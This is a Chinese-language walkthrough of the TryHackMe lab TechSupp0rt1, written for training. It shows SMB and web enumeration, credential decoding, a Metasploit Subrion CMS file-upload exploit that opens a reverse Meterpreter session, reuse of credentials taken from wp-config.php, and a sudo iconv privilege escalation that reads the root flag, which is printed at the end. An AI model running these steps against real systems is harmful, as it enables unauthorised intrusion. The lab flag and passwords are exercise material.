TryHackMe — TechSupp0rt1 渗透测试完整指南

介绍

TechSupp0rt1 是一个面向初学者的TryHackMe实验环境，模拟了一个诈骗者的网站。该实验涵盖了Web枚举、SMB发现、凭证解码、通过Subrion文件上传实现的远程代码执行（RCE），以及提升到root权限的完整过程。

初始侦察

我首先使用侵略性Nmap扫描来映射开放服务、识别版本并确定攻击路径优先级：

1

nmap -sV -sC -sS -Pn 10.201.64.113

扫描关键发现：

• 22/tcp — OpenSSH 7.2p2（SSH访问）
• 80/tcp — Apache httpd 2.4.18（Web服务器；显示默认Apache页面）
• 139/tcp & 445/tcp — Samba（SMB）共享（smbd 3.x/4.x）
• 主机名报告为TECHSUPPORT；操作系统为Linux（Ubuntu）

SMB枚举 - 列出共享

由于SMB端口开放，我检查了可用共享：

1

smbclient -L 10.201.64.113

结果：

• print$（打印机驱动程序）
• websvr（磁盘）
• IPC$（IPC服务）

websvr共享看起来很有希望，我使用smbclient挂载它：

1

smbclient //10.201.64.113/websvr

然后：

1
2
3
4
5
6

smb: \> ls
.                                  D        0  Sat May 29 08:17:38 2021
..                                 D        0  Sat May 29 08:03:47 2021
enter.txt                          N      273  Sat May 29 08:17:38 2021

smb: \> get enter.txt

在enter.txt中发现凭证

enter.txt内容揭示了任务说明和凭证：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

GOALS
=====
1) Make fake popup and host it online on Digital Ocean server
2) Fix subrion site, /subrion doesn't work, edit from panel
3) Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds|->

解密Subrion密码并发现登录页面

使用CyberChef进行适当的解码配方后，我成功检索到密码：Scam2021

Web枚举 - 发现Subrion后端

解码Subrion密码后，我专注于Web枚举以定位登录面板和隐藏目录。我对目标运行Dirsearch：

1

dirsearch -u http://10.201.64.113

初始扫描亮点：

• 多个.htaccess和.htpasswd文件返回403 Forbidden
• /phpinfo.php返回200，提供有价值的配置信息
• /test/和/wordpress/wp-login.php返回200

为了验证，我使用更大的目录列表重新运行Dirsearch：

1

dirsearch -u http://10.201.64.113 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

扫描结果确认：

• 301 - /subrion -> http://10.201.64.113/subrion/
• 301 - /wordpress -> http://10.201.64.113/wordpress/
• 301 - /test -> http://10.201.64.113/test/

获取访问权限 - 利用Subrion CMS

Subrion登录页面显示应用程序版本：Subrion CMS v4.2.1，这是一个已知的易受攻击版本。

我研究了该版本并发现了Subrion v4.2.1的文件上传RCE漏洞。为了获得远程代码执行，我使用了Metasploit并配置了适当的模块：

1
2
3
4
5
6
7

msfconsole
use exploit/multi/http/subrion_cms_file_upload_rce
set targeturi subrion/
set password Scam2021
set RHOSTS <target ip>
set LHOST <your ip>
run

成功获得Meterpreter会话。

枚举用户

在目标内部，我检查了具有有效shell的用户：

1

meterpreter > cat /etc/passwd | grep "sh"

输出显示用户scamsite和运行的MySQL服务。

提取WordPress凭证

我检查了WordPress配置文件以检索数据库凭证：

1

cat /var/www/html/wordpress/wp-config.php

关键细节：

• DB_USER: support
• DB_PASSWORD: ImAScammerLOL!123!

权限提升

我将Meterpreter shell升级并提升权限到scamsite用户：

1
2
3
4

meterpreter > shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
su scamsite
Password: ImAScammerLOL!123!

权限提升 - 获取Root访问权限

有了scamsite的shell后，我检查了可用的sudo权限：

1

sudo -l

输出显示：

1
2

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

这意味着scamsite可以在没有密码的情况下以root身份运行iconv - 这是使用GTFOBins进行权限提升的绝佳机会。

利用iconv获取Root

按照GTFOBins说明，我设置目标文件来读取root标志：

1
2

scamsite@TechSupport:~$ LFILE=/root/root.txt
scamsite@TechSupport:~$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"

捕获Root标志

执行命令返回root标志：

1

851b8233a8c09400ec30651bd1529bf1ed02790b